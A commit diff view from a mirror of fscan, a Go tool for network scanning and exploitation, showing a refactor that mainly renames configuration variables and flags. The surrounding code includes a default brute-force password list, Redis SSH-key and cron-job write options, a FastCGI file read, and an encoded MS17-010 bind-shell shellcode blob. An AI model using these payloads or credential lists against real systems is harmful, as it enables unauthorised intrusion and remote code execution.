admin/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-06-21 02:10:55 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: 大型重构

Browse Source
This commit is contained in:
ZacharyZcR 2024-12-20 03:46:09 +08:00
parent c0b7f4ca4f
commit bdeabec67e
27 changed files with 227 additions and 232 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

112
Common/Config.go
View File

@ -15,33 +15,8 @@ var Userdict = map[string][]string{
var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "{user}@123#4", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "123456!a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "1qaz!QAZ", "2wsx@WSX", "qwe123!@#", "Aa123456!", "A123456s!", "sa123456", "1q2w3e", "Charge123", "Aa123456789"}
var PortGroup = map[string]string{
"ftp": "21",
"ssh": "22",
"findnet": "135",
"netbios": "139",
"smb": "445",
"mssql": "1433",
"oracle": "1521",
"mysql": "3306",
"rdp": "3389",
"psql": "5432",
"redis": "6379",
"fcgi": "9000",
"mem": "11211",
"mgo": "27017",
"ms17010": "445",
"cve20200796": "445",
"service": "21,22,135,139,445,1433,1521,3306,3389,5432,6379,9000,11211,27017",
"db": "1433,1521,3306,5432,6379,11211,27017",
"web": "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880",
"all": "1-65535",
"main": "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017",
}
var Outputfile = "result.txt"
var IsSave = true
var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880"
var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"
type PocInfo struct {
Target string
@ -49,50 +24,69 @@ type PocInfo struct {
}
var (
// 目标配置
Ports string
Path string
Scantype string
Command string
SshKey string
Domain string
ExcludePorts string // 原NoPorts
ExcludeHosts string
AddPorts string // 原PortAdd
// 认证配置
Username string
Password string
Proxy string
Domain string
SshKeyPath string // 原SshKey
AddUsers string // 原UserAdd
AddPasswords string // 原PassAdd
// 扫描配置
ScanMode string // 原Scantype
ThreadNum int // 原Threads
Timeout int64 = 3
LiveTop int
DisablePing bool // 原NoPing
UsePing bool // 原Ping
Command string
// 文件配置
HostsFile string // 原HostFile
UsersFile string // 原Userfile
PasswordsFile string // 原Passfile
HashFile string // 原Hashfile
PortsFile string // 原PortFile
// Web配置
TargetURL string // 原URL
URLsFile string // 原UrlFile
URLs []string // 原Urls
WebTimeout int64 = 5
TmpSave bool
NoPing bool
Ping bool
HttpProxy string // 原Proxy
Socks5Proxy string
// POC配置
PocPath string
Pocinfo PocInfo
NoPoc bool
IsBrute bool
DisablePoc bool // 原NoPoc
// Redis配置
RedisFile string
RedisShell string
Userfile string
Passfile string
Hashfile string
HostFile string
PortFile string
PocPath string
Threads int
URL string
UrlFile string
Urls []string
NoPorts string
NoHosts string
SC string
PortAdd string
UserAdd string
PassAdd string
BruteThread int
LiveTop int
Socks5Proxy string
Hash string
Hashs []string
DisableRedis bool // 原Noredistest
// 爆破配置
DisableBrute bool // 原IsBrute
BruteThreads int // 原BruteThread
// 其他配置
RemotePath string // 原Path
HashValue string // 原Hash
HashValues []string // 原Hashs
HashBytes [][]byte
HostPort []string
IsWmi bool
Noredistest bool
Shellcode string // 原SC
EnableWmi bool // 原IsWmi
// 输出配置
DisableSave bool // 原TmpSave
)
var (

56
Common/Flag.go
View File

@ -21,47 +21,47 @@ func Flag(Info *HostInfo) {
// 目标配置
flag.StringVar(&Info.Host, "h", "", "目标主机IP例如: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12")
flag.StringVar(&NoHosts, "hn", "", "排除的主机范围,例如: -hn 192.168.1.1/24")
flag.StringVar(&Ports, "p", DefaultPorts, "端口配置,例如: 22 | 1-65535 | 22,80,3306")
flag.StringVar(&PortAdd, "pa", "", "在默认端口基础上添加端口,-pa 3389")
flag.StringVar(&NoPorts, "pn", "", "排除的端口,例如: -pn 445")
flag.StringVar(&ExcludeHosts, "eh", "", "排除的主机范围,例如: -eh 192.168.1.1/24")
flag.StringVar(&Ports, "p", MainPorts, "端口配置,例如: 22 | 1-65535 | 22,80,3306")
flag.StringVar(&AddPorts, "pa", "", "在默认端口基础上添加端口,-pa 3389")
flag.StringVar(&ExcludePorts, "pn", "", "排除的端口,例如: -pn 445")
// 认证配置
flag.StringVar(&UserAdd, "usera", "", "在默认用户列表基础上添加用户,-usera user")
flag.StringVar(&PassAdd, "pwda", "", "在默认密码列表基础上添加密码,-pwda password")
flag.StringVar(&AddUsers, "usera", "", "在默认用户列表基础上添加用户,-usera user")
flag.StringVar(&AddPasswords, "pwda", "", "在默认密码列表基础上添加密码,-pwda password")
flag.StringVar(&Username, "user", "", "用户名")
flag.StringVar(&Password, "pwd", "", "密码")
flag.StringVar(&Domain, "domain", "", "域名(用于SMB)")
flag.StringVar(&SshKey, "sshkey", "", "SSH密钥文件(id_rsa)")
flag.StringVar(&SshKeyPath, "sshkey", "", "SSH密钥文件(id_rsa)")
// 扫描配置
flag.StringVar(&Scantype, "m", "all", "扫描类型,例如: -m ssh")
flag.IntVar(&Threads, "t", 600, "线程数量")
flag.StringVar(&ScanMode, "m", "all", "扫描类型,例如: -m ssh")
flag.IntVar(&ThreadNum, "t", 600, "线程数量")
flag.Int64Var(&Timeout, "time", 3, "超时时间(秒)")
flag.IntVar(&LiveTop, "top", 10, "显示存活主机数量")
flag.BoolVar(&NoPing, "np", false, "禁用存活探测")
flag.BoolVar(&Ping, "ping", false, "使用ping替代ICMP")
flag.BoolVar(&DisablePing, "np", false, "禁用存活探测")
flag.BoolVar(&UsePing, "ping", false, "使用ping替代ICMP")
flag.StringVar(&Command, "c", "", "执行命令(支持ssh|wmiexec)")
// 文件配置
flag.StringVar(&HostFile, "hf", "", "主机列表文件")
flag.StringVar(&Userfile, "userf", "", "用户名字典")
flag.StringVar(&Passfile, "pwdf", "", "密码字典")
flag.StringVar(&Hashfile, "hashf", "", "Hash字典")
flag.StringVar(&PortFile, "portf", "", "端口列表文件")
flag.StringVar(&HostsFile, "hf", "", "主机列表文件")
flag.StringVar(&UsersFile, "userf", "", "用户名字典")
flag.StringVar(&PasswordsFile, "pwdf", "", "密码字典")
flag.StringVar(&HashFile, "hashf", "", "Hash字典")
flag.StringVar(&PortsFile, "portf", "", "端口列表文件")
// Web配置
flag.StringVar(&URL, "u", "", "目标URL")
flag.StringVar(&UrlFile, "uf", "", "URL列表文件")
flag.StringVar(&TargetURL, "u", "", "目标URL")
flag.StringVar(&URLsFile, "uf", "", "URL列表文件")
flag.StringVar(&Cookie, "cookie", "", "设置Cookie")
flag.Int64Var(&WebTimeout, "wt", 5, "Web请求超时时间")
flag.StringVar(&Proxy, "proxy", "", "设置HTTP代理")
flag.StringVar(&HttpProxy, "proxy", "", "设置HTTP代理")
flag.StringVar(&Socks5Proxy, "socks5", "", "设置Socks5代理(将用于TCP连接,超时设置将失效)")
// POC配置
flag.StringVar(&PocPath, "pocpath", "", "POC文件路径")
flag.StringVar(&Pocinfo.PocName, "pocname", "", "使用包含指定名称的POC,例如: -pocname weblogic")
flag.BoolVar(&NoPoc, "nopoc", false, "禁用Web漏洞扫描")
flag.BoolVar(&DisablePoc, "nopoc", false, "禁用Web漏洞扫描")
flag.BoolVar(&PocFull, "full", false, "完整POC扫描,如:shiro 100个key")
flag.BoolVar(&DnsLog, "dns", false, "启用dnslog验证")
flag.IntVar(&PocNum, "num", 20, "POC并发数")
@ -69,21 +69,21 @@ func Flag(Info *HostInfo) {
// Redis利用配置
flag.StringVar(&RedisFile, "rf", "", "Redis写入SSH公钥文件")
flag.StringVar(&RedisShell, "rs", "", "Redis写入计划任务")
flag.BoolVar(&Noredistest, "noredis", false, "禁用Redis安全检测")
flag.BoolVar(&DisableRedis, "noredis", false, "禁用Redis安全检测")
// 暴力破解配置
flag.BoolVar(&IsBrute, "nobr", false, "禁用密码爆破")
flag.IntVar(&BruteThread, "br", 1, "密码爆破线程数")
flag.BoolVar(&DisableBrute, "nobr", false, "禁用密码爆破")
flag.IntVar(&BruteThreads, "br", 1, "密码爆破线程数")
// 其他配置
flag.StringVar(&Path, "path", "", "FCG/SMB远程文件路径")
flag.StringVar(&Hash, "hash", "", "Hash值")
flag.StringVar(&SC, "sc", "", "MS17漏洞shellcode")
flag.BoolVar(&IsWmi, "wmi", false, "启用WMI")
flag.StringVar(&RemotePath, "path", "", "FCG/SMB远程文件路径")
flag.StringVar(&HashValue, "hash", "", "Hash值")
flag.StringVar(&Shellcode, "sc", "", "MS17漏洞shellcode")
flag.BoolVar(&EnableWmi, "wmi", false, "启用WMI")
// 输出配置
flag.StringVar(&Outputfile, "o", "result.txt", "结果输出文件")
flag.BoolVar(&TmpSave, "no", false, "禁用结果保存")
flag.BoolVar(&DisableSave, "no", false, "禁用结果保存")
flag.BoolVar(&Silent, "silent", false, "静默扫描模式")
flag.BoolVar(&Nocolor, "nocolor", false, "禁用彩色输出")
flag.BoolVar(&JsonOutput, "json", false, "JSON格式输出")

128
Common/Parse.go
View File

@ -21,7 +21,7 @@ func Parse(Info *HostInfo) {
// ParseUser 解析用户名配置,支持直接指定用户名列表或从文件读取
func ParseUser() error {
// 如果未指定用户名和用户名文件,直接返回
if Username == "" && Userfile == "" {
if Username == "" && UsersFile == "" {
return nil
}
@ -34,8 +34,8 @@ func ParseUser() error {
}
// 从文件加载用户名列表
if Userfile != "" {
users, err := Readfile(Userfile)
if UsersFile != "" {
users, err := Readfile(UsersFile)
if err != nil {
return fmt.Errorf("读取用户名文件失败: %v", err)
}
@ -77,8 +77,8 @@ func ParsePass(Info *HostInfo) error {
}
// 从文件加载密码列表
if Passfile != "" {
passes, err := Readfile(Passfile)
if PasswordsFile != "" {
passes, err := Readfile(PasswordsFile)
if err != nil {
return fmt.Errorf("读取密码文件失败: %v", err)
}
@ -92,8 +92,8 @@ func ParsePass(Info *HostInfo) error {
}
// 处理哈希文件
if Hashfile != "" {
hashes, err := Readfile(Hashfile)
if HashFile != "" {
hashes, err := Readfile(HashFile)
if err != nil {
return fmt.Errorf("读取哈希文件失败: %v", err)
}
@ -104,7 +104,7 @@ func ParsePass(Info *HostInfo) error {
continue
}
if len(line) == 32 {
Hashs = append(Hashs, line)
HashValues = append(HashValues, line)
validCount++
} else {
fmt.Printf("[!] 无效的哈希值(长度!=32): %s\n", line)
@ -114,23 +114,23 @@ func ParsePass(Info *HostInfo) error {
}
// 处理直接指定的URL列表
if URL != "" {
urls := strings.Split(URL, ",")
if TargetURL != "" {
urls := strings.Split(TargetURL, ",")
tmpUrls := make(map[string]struct{})
for _, url := range urls {
if url != "" {
if _, ok := tmpUrls[url]; !ok {
tmpUrls[url] = struct{}{}
Urls = append(Urls, url)
URLs = append(URLs, url)
}
}
}
fmt.Printf("[*] 已加载直接指定的URL: %d 个\n", len(Urls))
fmt.Printf("[*] 已加载直接指定的URL: %d 个\n", len(URLs))
}
// 从文件加载URL列表
if UrlFile != "" {
urls, err := Readfile(UrlFile)
if URLsFile != "" {
urls, err := Readfile(URLsFile)
if err != nil {
return fmt.Errorf("读取URL文件失败: %v", err)
}
@ -140,7 +140,7 @@ func ParsePass(Info *HostInfo) error {
if url != "" {
if _, ok := tmpUrls[url]; !ok {
tmpUrls[url] = struct{}{}
Urls = append(Urls, url)
URLs = append(URLs, url)
}
}
}
@ -148,8 +148,8 @@ func ParsePass(Info *HostInfo) error {
}
// 从文件加载端口列表
if PortFile != "" {
ports, err := Readfile(PortFile)
if PortsFile != "" {
ports, err := Readfile(PortsFile)
if err != nil {
return fmt.Errorf("读取端口文件失败: %v", err)
}
@ -205,53 +205,53 @@ func Readfile(filename string) ([]string, error) {
// ParseInput 解析和验证输入参数配置
func ParseInput(Info *HostInfo) error {
// 检查必要的目标参数
if Info.Host == "" && HostFile == "" && URL == "" && UrlFile == "" {
if Info.Host == "" && HostsFile == "" && TargetURL == "" && URLsFile == "" {
fmt.Println("[!] 未指定扫描目标")
flag.Usage()
return fmt.Errorf("必须指定扫描目标")
}
// 配置基本参数
if BruteThread <= 0 {
BruteThread = 1
fmt.Printf("[*] 已将暴力破解线程数设置为: %d\n", BruteThread)
if BruteThreads <= 0 {
BruteThreads = 1
fmt.Printf("[*] 已将暴力破解线程数设置为: %d\n", BruteThreads)
}
if TmpSave {
if DisableSave {
IsSave = false
fmt.Println("[*] 已启用临时保存模式")
}
// 处理端口配置
if Ports == DefaultPorts {
Ports += "," + Webport
if Ports == MainPorts {
Ports += "," + WebPorts
}
if PortAdd != "" {
if AddPorts != "" {
if strings.HasSuffix(Ports, ",") {
Ports += PortAdd
Ports += AddPorts
} else {
Ports += "," + PortAdd
Ports += "," + AddPorts
}
fmt.Printf("[*] 已添加额外端口: %s\n", PortAdd)
fmt.Printf("[*] 已添加额外端口: %s\n", AddPorts)
}
// 处理用户名配置
if UserAdd != "" {
users := strings.Split(UserAdd, ",")
if AddUsers != "" {
users := strings.Split(AddUsers, ",")
for dict := range Userdict {
Userdict[dict] = append(Userdict[dict], users...)
Userdict[dict] = RemoveDuplicate(Userdict[dict])
}
fmt.Printf("[*] 已添加额外用户名: %s\n", UserAdd)
fmt.Printf("[*] 已添加额外用户名: %s\n", AddUsers)
}
// 处理密码配置
if PassAdd != "" {
passes := strings.Split(PassAdd, ",")
if AddPasswords != "" {
passes := strings.Split(AddPasswords, ",")
Passwords = append(Passwords, passes...)
Passwords = RemoveDuplicate(Passwords)
fmt.Printf("[*] 已添加额外密码: %s\n", PassAdd)
fmt.Printf("[*] 已添加额外密码: %s\n", AddPasswords)
}
// 处理Socks5代理配置
@ -268,45 +268,45 @@ func ParseInput(Info *HostInfo) error {
if err != nil {
return fmt.Errorf("Socks5代理格式错误: %v", err)
}
NoPing = true
DisablePing = true
fmt.Printf("[*] 使用Socks5代理: %s\n", Socks5Proxy)
}
// 处理HTTP代理配置
if Proxy != "" {
switch Proxy {
if HttpProxy != "" {
switch HttpProxy {
case "1":
Proxy = "http://127.0.0.1:8080"
HttpProxy = "http://127.0.0.1:8080"
case "2":
Proxy = "socks5://127.0.0.1:1080"
HttpProxy = "socks5://127.0.0.1:1080"
default:
if !strings.Contains(Proxy, "://") {
Proxy = "http://127.0.0.1:" + Proxy
if !strings.Contains(HttpProxy, "://") {
HttpProxy = "http://127.0.0.1:" + HttpProxy
}
}
if !strings.HasPrefix(Proxy, "socks") && !strings.HasPrefix(Proxy, "http") {
if !strings.HasPrefix(HttpProxy, "socks") && !strings.HasPrefix(HttpProxy, "http") {
return fmt.Errorf("不支持的代理类型")
}
_, err := url.Parse(Proxy)
_, err := url.Parse(HttpProxy)
if err != nil {
return fmt.Errorf("代理格式错误: %v", err)
}
fmt.Printf("[*] 使用代理: %s\n", Proxy)
fmt.Printf("[*] 使用代理: %s\n", HttpProxy)
}
// 处理Hash配置
if Hash != "" {
if len(Hash) != 32 {
if HashValue != "" {
if len(HashValue) != 32 {
return fmt.Errorf("Hash长度必须为32位")
}
Hashs = append(Hashs, Hash)
HashValues = append(HashValues, HashValue)
}
// 处理Hash列表
Hashs = RemoveDuplicate(Hashs)
for _, hash := range Hashs {
HashValues = RemoveDuplicate(HashValues)
for _, hash := range HashValues {
hashByte, err := hex.DecodeString(hash)
if err != nil {
fmt.Printf("[!] Hash解码失败: %s\n", hash)
@ -314,7 +314,7 @@ func ParseInput(Info *HostInfo) error {
}
HashBytes = append(HashBytes, hashByte)
}
Hashs = []string{}
HashValues = []string{}
return nil
}
@ -323,34 +323,36 @@ func ParseInput(Info *HostInfo) error {
func ParseScantype(Info *HostInfo) error {
// 先处理特殊扫描类型
specialTypes := map[string]string{
"hostname": "135,137,139,445",
"webonly": Webport,
"webpoc": Webport,
"web": Webport,
"portscan": DefaultPorts + "," + Webport,
"main": DefaultPorts,
"all": DefaultPorts + "," + Webport,
"service": ServicePorts,
"db": DbPorts,
"web": WebPorts,
"all": AllPorts,
"main": MainPorts,
"port": MainPorts + "," + WebPorts,
"icmp": "", // ICMP不需要端口
}
// 如果是特殊扫描类型
if customPorts, isSpecial := specialTypes[Scantype]; isSpecial {
if Scantype != "all" && Ports == DefaultPorts+","+Webport {
if customPorts, isSpecial := specialTypes[ScanMode]; isSpecial {
// 专门处理 all 类型
if ScanMode == "all" {
Ports = AllPorts // 直接设置为 1-65535
} else if Ports == MainPorts+","+WebPorts {
Ports = customPorts
}
fmt.Printf("[*] 扫描类型: %s, 目标端口: %s\n", Scantype, Ports)
fmt.Printf("[*] 扫描类型: %s, 目标端口: %s\n", ScanMode, Ports)
return nil
}
// 检查是否是注册的插件类型
plugin, validType := PluginManager[Scantype]
plugin, validType := PluginManager[ScanMode]
if !validType {
showmode()
return fmt.Errorf("无效的扫描类型: %s", Scantype)
return fmt.Errorf("无效的扫描类型: %s", ScanMode)
}
// 如果是插件扫描且使用默认端口配置
if Ports == DefaultPorts+","+Webport {
if Ports == MainPorts+","+WebPorts {
if plugin.Port > 0 {
Ports = strconv.Itoa(plugin.Port)
}

12
Common/ParsePort.go
View File

@ -23,20 +23,12 @@ func ParsePort(ports string) []int {
continue
}
// 处理预定义端口组
if PortGroup[port] != "" {
groupPorts := ParsePort(PortGroup[port])
scanPorts = append(scanPorts, groupPorts...)
fmt.Printf("[*] 解析端口组 %s -> %v\n", port, groupPorts)
continue
}
// 处理端口范围
upper := port
if strings.Contains(port, "-") {
ranges := strings.Split(port, "-")
if len(ranges) < 2 {
fmt.Printf("[!] 无效的端口范围格式: %s\n", port)
fmt.Printf("[-] 无效的端口范围格式: %s\n", port)
continue
}
@ -57,7 +49,7 @@ func ParsePort(ports string) []int {
end, _ := strconv.Atoi(upper)
for i := start; i <= end; i++ {
if i > 65535 || i < 1 {
fmt.Printf("[!] 忽略无效端口: %d\n", i)
fmt.Printf("[-] 忽略无效端口: %d\n", i)
continue
}
scanPorts = append(scanPorts, i)

7
Common/Ports.go Normal file
View File

@ -0,0 +1,7 @@
package Common
var ServicePorts = "21,22,135,139,445,1433,1521,3306,3389,5432,6379,9000,11211,27017"
var DbPorts = "1433,1521,3306,5432,6379,11211,27017"
var WebPorts = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880"
var AllPorts = "1-65535"
var MainPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"

4
Core/PortScan.go
View File

@ -29,7 +29,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
probePorts = excludeNoPorts(probePorts)
// 创建通道
workers := Common.Threads
workers := Common.ThreadNum
addrs := make(chan Addr, 100)
results := make(chan string, 100)
var wg sync.WaitGroup
@ -110,7 +110,7 @@ func NoPortScan(hostslist []string, ports string) []string {
// excludeNoPorts 排除指定的端口
func excludeNoPorts(ports []int) []int {
noPorts := Common.ParsePort(Common.NoPorts)
noPorts := Common.ParsePort(Common.ExcludePorts)
if len(noPorts) == 0 {
return ports
}

22
Core/Scanner.go
View File

@ -13,8 +13,8 @@ func Scan(info Common.HostInfo) {
fmt.Println("[*] 开始信息扫描...")
// 本地信息收集模块
if Common.Scantype == "localinfo" {
ch := make(chan struct{}, Common.Threads)
if Common.ScanMode == "localinfo" {
ch := make(chan struct{}, Common.ThreadNum)
wg := sync.WaitGroup{}
AddScan("localinfo", info, &ch, &wg)
wg.Wait()
@ -25,7 +25,7 @@ func Scan(info Common.HostInfo) {
}
// 解析目标主机IP
Hosts, err := Common.ParseIP(info.Host, Common.HostFile, Common.NoHosts)
Hosts, err := Common.ParseIP(info.Host, Common.HostsFile, Common.ExcludeHosts)
if err != nil {
fmt.Printf("[!] 解析主机错误: %v\n", err)
return
@ -33,23 +33,23 @@ func Scan(info Common.HostInfo) {
// 初始化配置
lib.Inithttp()
ch := make(chan struct{}, Common.Threads)
ch := make(chan struct{}, Common.ThreadNum)
wg := sync.WaitGroup{}
var AlivePorts []string
if len(Hosts) > 0 || len(Common.HostPort) > 0 {
// ICMP存活性检测
if (Common.NoPing == false && len(Hosts) > 1) || Common.Scantype == "icmp" {
Hosts = CheckLive(Hosts, Common.Ping)
if (Common.DisablePing == false && len(Hosts) > 1) || Common.ScanMode == "icmp" {
Hosts = CheckLive(Hosts, Common.UsePing)
fmt.Printf("[+] ICMP存活主机数量: %d\n", len(Hosts))
if Common.Scantype == "icmp" {
if Common.ScanMode == "icmp" {
Common.LogWG.Wait()
return
}
}
// 端口扫描策略
AlivePorts = executeScanStrategy(Hosts, Common.Scantype)
AlivePorts = executeScanStrategy(Hosts, Common.ScanMode)
// 处理自定义端口
if len(Common.HostPort) > 0 {
@ -69,12 +69,12 @@ func Scan(info Common.HostInfo) {
}
info.Host, info.Ports = hostParts[0], hostParts[1]
executeScanTasks(info, Common.Scantype, &ch, &wg)
executeScanTasks(info, Common.ScanMode, &ch, &wg)
}
}
// URL扫描
for _, url := range Common.Urls {
for _, url := range Common.URLs {
info.Url = url
AddScan("web", info, &ch, &wg)
}
@ -115,7 +115,7 @@ func executeScanTasks(info Common.HostInfo, scanType string, ch *chan struct{},
switch info.Ports {
case "135":
AddScan("findnet", info, ch, wg)
if Common.IsWmi {
if Common.EnableWmi {
AddScan("wmiexec", info, ch, wg)
}
case "445":

2
Plugins/FTP.go
View File

@ -11,7 +11,7 @@ import (
// FtpScan 执行FTP服务扫描
func FtpScan(info *Common.HostInfo) (tmperr error) {
// 如果已开启暴力破解则直接返回
if Common.IsBrute {
if Common.DisableBrute {
return
}

6
Plugins/FcgiScan.go
View File

@ -21,14 +21,14 @@ import (
// FcgiScan 执行FastCGI服务器漏洞扫描
func FcgiScan(info *Common.HostInfo) error {
// 如果设置了暴力破解模式则跳过
if Common.IsBrute {
if Common.DisableBrute {
return nil
}
// 设置目标URL路径
url := "/etc/issue"
if Common.Path != "" {
url = Common.Path
if Common.RemotePath != "" {
url = Common.RemotePath
}
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)

10
Plugins/MS17010-Exp.go
View File

@ -19,7 +19,7 @@ func MS17010EXP(info *Common.HostInfo) {
var sc string
// 根据不同类型选择shellcode
switch Common.SC {
switch Common.Shellcode {
case "bind":
// msfvenom生成的Bind Shell, 监听64531端口
sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK"
@ -56,15 +56,15 @@ func MS17010EXP(info *Common.HostInfo) {
default:
// 从文件读取或直接使用提供的shellcode
if strings.Contains(Common.SC, "file:") {
read, err := ioutil.ReadFile(Common.SC[5:])
if strings.Contains(Common.Shellcode, "file:") {
read, err := ioutil.ReadFile(Common.Shellcode[5:])
if err != nil {
Common.LogError(fmt.Sprintf("[-] MS17010读取Shellcode文件 %v 失败: %v", Common.SC, err))
Common.LogError(fmt.Sprintf("[-] MS17010读取Shellcode文件 %v 失败: %v", Common.Shellcode, err))
return
}
sc = fmt.Sprintf("%x", read)
} else {
sc = Common.SC
sc = Common.Shellcode
}
}

4
Plugins/MS17010.go
View File

@ -84,7 +84,7 @@ func init() {
// MS17010 扫描入口函数
func MS17010(info *Common.HostInfo) error {
// 暴力破解模式下跳过扫描
if Common.IsBrute {
if Common.DisableBrute {
return nil
}
@ -200,7 +200,7 @@ func MS17010Scan(info *Common.HostInfo) error {
// 如果指定了shellcode,执行漏洞利用
defer func() {
